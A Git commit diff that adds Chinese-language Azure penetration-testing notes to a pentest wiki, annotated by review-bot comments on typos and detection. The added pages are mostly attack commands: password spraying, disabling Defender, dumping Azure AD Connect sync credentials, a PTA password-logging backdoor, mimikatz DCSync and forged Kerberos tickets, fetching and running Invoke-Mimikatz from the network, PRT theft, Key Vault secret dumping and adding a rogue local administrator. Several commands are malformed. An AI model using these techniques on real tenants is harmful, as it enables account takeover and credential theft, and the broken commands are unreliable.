
Commit e7b8f28

committed
update cloud hacking
1 parent fa58b77 commit e7b8f28

26 files changed

+763
-2
lines changed

wiki/README.md

+22
Original file line numberDiff line numberDiff line change
@@ -584,6 +584,28 @@
584584
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限提升.md)
585585
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限维持.md)
586586
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/枚举.md)
587+
- [Azure](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/README.md)
588+
- [侦察工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/侦察工具.md)
589+
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/枚举.md)
590+
- [非法同意](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/非法同意.md)
591+
- [钓鱼](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/钓鱼.md)
592+
- [令牌](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/令牌.md)
593+
- [向所有EnterpriseApplications添加凭据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/向所有EnterpriseApplications添加凭据.md)
594+
- [为AzureWeb应用程序生成SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md)
595+
- [Azure存储Blob](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Azure存储Blob.md)
596+
- [自动化runbook](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/自动化runbook.md)
597+
- [虚拟机runCommand](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/虚拟机runCommand.md)
598+
- [KeyVault](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/KeyVault.md)
599+
- [Pass-The-PRT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-PRT.md)
600+
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-Certificate.md)
601+
- [Intunes管理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Intunes管理.md)
602+
- [动态组成员资格](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/动态组成员资格.md)
603+
- [Administrative-Unit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Administrative-Unit.md)
604+
- [部署模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/部署模板.md)
605+
- [应用程序代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/应用程序代理.md)
606+
- [条件访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/条件访问.md)
607+
- [AzureAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD.md)
608+
- [AzureAD连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD连接.md)
587609
- [Aliyun](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/README.md)
588610
- [osskey](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/osskey.md)
589611
- [工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/工具.md)
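Review bot: the new entry at line 601, 'Intunes管理', misspells the product name; Microsoft Intune has no trailing 's', so the link text and the target file wiki/云安全/Azure/Intunes管理.md should be renamed to 'Intune管理' before more pages link to it. Style point for the same block: most of the new entries carry Chinese titles while 'Administrative-Unit', 'Pass-The-PRT', 'Pass-The-Certificate' and 'KeyVault' keep English ones; pick one convention for the index.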

wiki/云安全/AWS/README.md

+1
@@ -1,3 +1,4 @@
1+
translate from https://github.com/swisskyrepo/PayloadsAllTheThings
12
- [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/初始访问.md)
23
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限提升.md)
34
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限维持.md)
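Review bot: the attribution added at line 1, 'translate from https://github.com/swisskyrepo/PayloadsAllTheThings', should read 'translated from', point at the specific upstream page rather than the repository root, and carry the upstream MIT licence notice, which requires the copyright notice to accompany derived copies.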
@@ -0,0 +1,9 @@
1+
Administrative Unit可以重置其他用户密码
2+
3+
PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
4+
PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
5+
PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
6+
PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
7+
PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl
8+
PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
9+
PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose
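Review bot: lines 8 and 9 will not run as written: `ConvertToSecureString` and `SetAzureADUserPassword` are missing the verb-noun hyphen and should be `ConvertTo-SecureString` and `Set-AzureADUserPassword`. The opening statement at line 1 also overstates the point: an Administrative Unit does not by itself allow resetting other users' passwords; it is the scoped role assignment inside the AU (exactly what `Get-AzureADMSScopedRoleMembership` at line 5 lists) that grants the right, so the sentence should say that, and the defensive takeaway to document is a periodic review of AU scoped role memberships.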

wiki/云安全/Azure/AzureAD.md

+26
@@ -0,0 +1,26 @@
1+
对于 Microsoft,如果您将任何云服务(Office 365、Exchange Online 等)与 Active Directory(本地或在 Azure 中)一起使用,那么攻击者只需一个凭证就可以通过 Azure AD泄露您的整个 Active Directory 结构
2+
验证您的网络邮件门户(即https://webmail.domain.com/)
3+
将浏览器 URL 更改为:https ://azure.microsoft.com/
4+
从活动会话中选择帐户
5+
选择 Azure Active Directory
6+
| Active Directory | Azure AD |
7+
|---|---|
8+
| LDAP | REST API'S |
9+
| NTLM/Kerberos | OAuth/SAML/OpenID |
10+
| Structured directory (OU tree) | Flat structure |
11+
| GPO | No GPO's |
12+
| Super fine-tuned access controls | Predefined roles |
13+
| Domain/forest | Tenant |
14+
| Trusts | Guests |
15+
16+
密码喷射
17+
>git clone https://github.com/dafthack/MSOLSpray
18+
>Import-Module .\MSOLSpray.ps1
19+
>Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
20+
>Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
21+
将 GUID 转换为 SID
22+
通过连接"S-1–12–1-"到 AAD Id 的每个部分的十进制表示,将用户的 AAD id 转换为 SID。
23+
24+
GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
25+
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
26+
例如,表示6aa89ecb-1f8f-4d92–810d-b0dce30b6c82是S-1–12–1–1789435595–1301421967–3702525313–2188119011
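Review bot: the GUID-to-SID method at lines 22 to 25 is stated incorrectly even though the example at line 26 is correct. A GUID string has five groups (8-4-4-4-12), not four, and the SID sub-authorities are the GUID's 16 bytes read as four little-endian 32-bit integers, so the second and third textual groups (1f8f and 4d92) are combined and byte-swapped into 0x4d921f8f = 1301421967; taking base10 of a textual group on its own gives a different number. Rewrite lines 24 and 25 to say the four values are the GUID's four little-endian DWORDs. In the same block the SID is written with en-dashes ('S-1–12–1-') instead of ASCII hyphens, and the example GUID at line 26 contains one too, which breaks copy-paste; line 3 has a stray space in 'https ://azure.microsoft.com/'.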

wiki/云安全/Azure/AzureAD连接.md

+59
@@ -0,0 +1,59 @@
1+
#### 检查是否安装了 Azure AD Connect:Get-ADSyncConnector
2+
3+
对于PHS,我们可以提取凭证
4+
对于PTA,我们可以安装代理
5+
对于联合身份,我们可以使用 DA 从 ADFS 服务器提取证书
6+
PS > Set-MpPreference -DisableRealtimeMonitoring $true
7+
PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents
8+
PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals
9+
PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
10+
PS > Get-AADIntSyncCredentials
11+
12+
获取 SYNC 帐户的令牌并重置本地管理员密码
13+
PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
14+
PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
15+
PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
16+
PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId
17+
PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
18+
19+
#### 检查是否安装了 PTA:Get-Command -Module PassthroughAuthPSModule
20+
安装 PTA 后门
21+
PS AADInternals> Install-AADIntPTASpy
22+
PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
23+
24+
#### Azure AD Connect - 密码提取
25+
AD Sync 中的凭据:C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
26+
工具 | 需要在目标上执行代码 | DLL 依赖项 | 本地需要 MSSQL | 本地需要python
27+
--- | --- | --- | --- | ---
28+
ADSyncDecrypt | 是 | 是 | 否 | 否
29+
ADSyncGather | 是 | 否 | 否 | 是
30+
ADSyncQuery | 否 (仅限网络 RPC 调用) | 否 | 是 | 是
31+
32+
git clone https://github.com/fox-it/adconnectdump
33+
#### Azure AD Connect - MSOL 帐户的密码和 DCSync
34+
可以使用 MSOL 帐户执行DCSync攻击
35+
要求:
36+
使用 Azure AD Connect 服务破坏服务器
37+
访问 ADSyncAdmins 或本地管理员组
38+
使用azuread_decrypt_msol.ps1来恢复 MSOL 帐户的解密密码:
39+
azuread_decrypt_msol.ps1: AD Connect 同步凭证提取 POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
40+
azuread_decrypt_msol_v2.ps1:更新了转储 Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c使用的 MSOL 服务帐户(允许 DCSync)的方法
41+
现在可以使用检索到的 MSOL 帐户凭据来发起 DCSync 攻击。
42+
#### Azure AD Connect - 银票上的无缝单点登录
43+
任何可以编辑 AZUREADSSOACCS$ 帐户属性的人都可以使用 Kerberos 模拟 Azure AD 中的任何用户(如果没有 MFA)
44+
PHS 和 PTA 都支持无缝 SSO。如果启用无缝 SSO,则会在本地 AD 中创建计算机帐户AZUREADSSOC。
45+
AZUREADSSOACC 帐户的密码永远不会更改。
46+
使用https://autologon.microsoftazuread-sso.com/将 Kerberos 票证转换为 Office 365 和 Azure 的 SAML 和 JWT
47+
48+
AZUREADSSOACC 帐户的 NTLM 密码哈希,例如f9969e088b2c13d93833d0ce436c76dd.
49+
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
50+
我们要模拟的用户的 AAD 登录名,例如elrond@contoso.com. 这通常是他的 userPrincipalName 或来自本地 AD 的邮件属性。
51+
我们要模拟的用户的 SID,例如S-1-5-21-2121516926-2695913149-3163778339-1234.
52+
创建 Silver Ticket 并将其注入 Kerberos 缓存:
53+
mimikatz.exe "kerberos::golden /user:elrond
54+
/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
55+
/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
56+
/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
57+
启动 Mozilla Firefox
58+
转到 about:config 并将network.negotiate-auth.trusted-uris preference值设置为https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com
59+
导航到与我们的 AAD 域集成的任何 Web 应用程序。填写用户名,同时将密码字段留空。
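Review bot: several commands in this hunk fail when pasted: `ConvertToSecureString` at line 13 and `GetAADIntAccessTokenForAADGraph` at line 15 lack the verb-noun hyphen, and `–SaveToCache` at line 15 uses an en-dash instead of `-`. Lines 44 and 45 name the Seamless SSO computer account inconsistently (`AZUREADSSOC` vs `AZUREADSSOACC`); the account is AZUREADSSOACC$, as line 43 has it. Line 45 ('the password never changes') should be paired with the mitigation from Microsoft's Seamless SSO guidance, which is to roll over the Kerberos decryption key of AZUREADSSOACC at least every 30 days so that tickets forged from an old hash stop working, and the `Set-MpPreference -DisableRealtimeMonitoring $true` step at line 6 deserves a note that it is a high-fidelity detection event (and is blocked outright where Defender tamper protection is on).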
+12
@@ -0,0 +1,12 @@
1+
枚举 blob
2+
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
3+
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
4+
Found Storage Account - testsecure.blob.core.windows.net
5+
Found Storage Account - securetest.blob.core.windows.net
6+
Found Storage Account - securedata.blob.core.windows.net
7+
Found Storage Account - securefiles.blob.core.windows.net
8+
列出和下载 blob
9+
PS Az> Get-AzResource
10+
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
11+
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
12+
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
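Review bot: line 2 dot-sources `InvokeEnumerateAzureBlobs.ps1`, but the MicroBurst script is `Invoke-EnumerateAzureBlobs.ps1` (hyphenated, like the cmdlet it defines on line 3), so the path will not resolve. Line 12 ends with a bare `-Blob`: `Get-AzStorageBlobContent -Blob` requires a blob name, so the command is cut off and needs its `<NAME>` placeholder. Lines 4 to 7 are sample output, not commands, and should be set off from the command lines so readers do not paste them.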

wiki/云安全/Azure/Intunes管理.md

+9
@@ -0,0 +1,9 @@
1+
要求:
2+
全局管理员或Intune管理员特权:Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
3+
4+
登录https://endpoint.microsoft.com/#home或使用 Pass-The-PRT
5+
转到设备->所有设备以检查注册到 Intune 的设备
6+
转到脚本并单击添加Windows 10。
7+
添加Powershell 脚本
8+
在分配页面中指定添加所有用户和添加所有设备。
9+
执行脚本最多需要一小时
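Review bot: the prerequisite check at line 2 looks up a group named 'Intune Administrators', but Intune Administrator is an Azure AD directory role, not a group, so `Get-AzureADGroup -Filter` returns nothing in most tenants; the check should use `Get-AzureADDirectoryRole` with `Get-AzureADDirectoryRoleMember`. The file name 'Intunes管理.md' misspells Intune. Since the procedure ends with a script assigned to all users and all devices, the page should also state where that leaves evidence: script creation and assignment are recorded in the Intune audit log, which is what a defender monitors for this.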

wiki/云安全/Azure/KeyVault.md

+13
@@ -0,0 +1,13 @@
1+
keyvault 访问令牌
2+
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
3+
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
4+
5+
连接
6+
PS> $token = 'eyJ0..'
7+
PS> $keyvaulttoken = 'eyJ0..'
8+
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
9+
10+
查询vault和密钥
11+
PS Az> Get-AzKeyVault
12+
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
13+
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
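Review bot: the query parameter at lines 2 and 3 is misspelled: the managed identity endpoint expects `api-version=2017-09-01`, not `apiversion=`, so both `curl` calls are rejected; quoting the header as `-H "secret:$IDENTITY_HEADER"` is also safer. Line 8 embeds a malformed account id (`2e91a4fea0f2-46ee-8214-fa2ff6aa9abc`, first group too long) and lines 12 and 13 use a specific vault and secret name (`ResearchKeyVault`, `Reader`); replace them with `<...>` placeholders as the other pages do.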
@@ -0,0 +1,15 @@
1+
Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose
2+
Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert
3+
4+
需要 PRT、TenantID、Context 和 DerivedKey
5+
& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId <TENANT-ID> --prt <PRT> --userName <Username>@<TENANT NAME>.onmicrosoft.com --hexCtx <HEX-CONTEXT> --hexDerivedKey <HEX-DERIVED-KEY>
6+
PFX 使用名称 <Username>@<TENANT NAME>.onmicrosoft.com.pfx 和密码 AzureADCert 保存
7+
Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine
8+
9+
https://github.com/morRubin/AzureADJoinedMachinePTC
10+
11+
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
12+
Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10
13+
14+
python Main.py --usercert C:\Users\Username\Documents\username\<USERNAME>@<TENANT NAME>.onmicrosoft.com.pfx --
15+
certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add"
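Review bot: line 1 copies `PrtToCertmaster.zip` but line 2 extracts `PrtToCert-master.zip`; one of the two names is wrong, and line 1 also uses an en-dash in `–Verbose`. Lines 14 and 15 are a single command split across two lines with a dangling `--`; join them (or end line 14 with a PowerShell backtick) so `--certpass` is parsed as one argument. Line 7 is left in English while the rest of the page is translated. Since line 7 says the tool runs PSEXEC on the target, the page should also name the resulting artefact a defender looks for: a new service installed on the target host.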

wiki/云安全/Azure/Pass-The-PRT.md

+28
@@ -0,0 +1,28 @@
1+
MimiKatz(2.2.0 及更高版本)可用于通过用于 Azure AD SSO(单点登录)的主刷新令牌 (PRT) 来攻击(混合)加入 Azure AD 的机器进行横向移动攻击。
2+
3+
运行 mimikatz 获取 PRT
4+
PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
5+
PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
6+
7+
复制 PRT 和 KeyValue
8+
Mimikatz> privilege::debug
9+
Mimikatz> token::elevate
10+
Mimikatz> dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect
11+
12+
复制 Context、ClearKey 和 DerivedKey
13+
Mimikatz> dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /Prt:<PRT>
14+
生成 JWT
15+
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
16+
PS AADInternals> $PRT_OF_USER = '...'
17+
PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="}
18+
PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER))
19+
PS AADInternals> $ClearKey = "XXYYZZ..."
20+
PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
21+
PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce
22+
eyJ0eXAiOiJKV1QiL...
23+
( JSON Web 令牌)可以在https://login.microsoftonline.com/login.srf<Signed JWT>的(匿名)浏览器会话中用作 PRT cookie 。 使用以下值编辑 Chrome cookie (F12) -> 应用程序 -> Cookies:
24+
25+
Name: x-ms-RefreshTokenCredential
26+
Value: <Signed JWT>
27+
HttpOnly: √
28+
️用标志HTTPOnly和标记 cookie Secure。
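Review bot: line 23 is garbled: the URL and the placeholder are fused into `https://login.microsoftonline.com/login.srf<Signed JWT>`; it should say that the signed JWT is used as the PRT cookie in an anonymous browser session at https://login.microsoftonline.com/login.srf. Line 28 starts with a stray invisible character and its words are out of order ('用标志HTTPOnly和标记 cookie Secure'); since line 27 already shows `HttpOnly: √`, line 28 should simply become a `Secure: √` row of the same list. Line 21 `–GetNonce` uses an en-dash instead of `-`.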

wiki/云安全/Azure/README.md

+22
@@ -0,0 +1,22 @@
1+
translate from https://github.com/swisskyrepo/PayloadsAllTheThings
2+
- [侦察工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/侦察工具.md)
3+
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/枚举.md)
4+
- [非法同意](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/非法同意.md)
5+
- [钓鱼](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/钓鱼.md)
6+
- [令牌](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/令牌.md)
7+
- [向所有EnterpriseApplications添加凭据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/向所有EnterpriseApplications添加凭据.md)
8+
- [为AzureWeb应用程序生成SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md)
9+
- [Azure存储Blob](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Azure存储Blob.md)
10+
- [自动化runbook](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/自动化runbook.md)
11+
- [虚拟机runCommand](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/虚拟机runCommand.md)
12+
- [KeyVault](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/KeyVault.md)
13+
- [Pass-The-PRT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-PRT.md)
14+
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-Certificate.md)
15+
- [Intunes管理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Intunes管理.md)
16+
- [动态组成员资格](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/动态组成员资格.md)
17+
- [Administrative-Unit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Administrative-Unit.md)
18+
- [部署模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/部署模板.md)
19+
- [应用程序代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/应用程序代理.md)
20+
- [条件访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/条件访问.md)
21+
- [AzureAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD.md)
22+
- [AzureAD连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD连接.md)
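Review bot: this file duplicates the 21 Azure entries added to wiki/README.md in the same commit, so the two lists must be kept in sync (the 'Intunes管理' misspelling appears in both). Line 1 'translate from' should read 'translated from', link the specific upstream page rather than the repository root, and carry the upstream MIT licence notice.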
@@ -0,0 +1 @@
1+
>az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
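Review bot: the page is a single command with no explanation, and the index title it is filed under ('为AzureWeb应用程序生成SSH', generate SSH for an Azure web app) misdescribes it: `az webapp create-remote-connection` opens a local TCP tunnel to the App Service's SSH endpoint and generates nothing. Add a sentence stating what the command does and its prerequisites (a Linux App Service with SSH enabled on the container, and rights on the app sufficient to retrieve its publishing credentials, which the tunnel uses).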
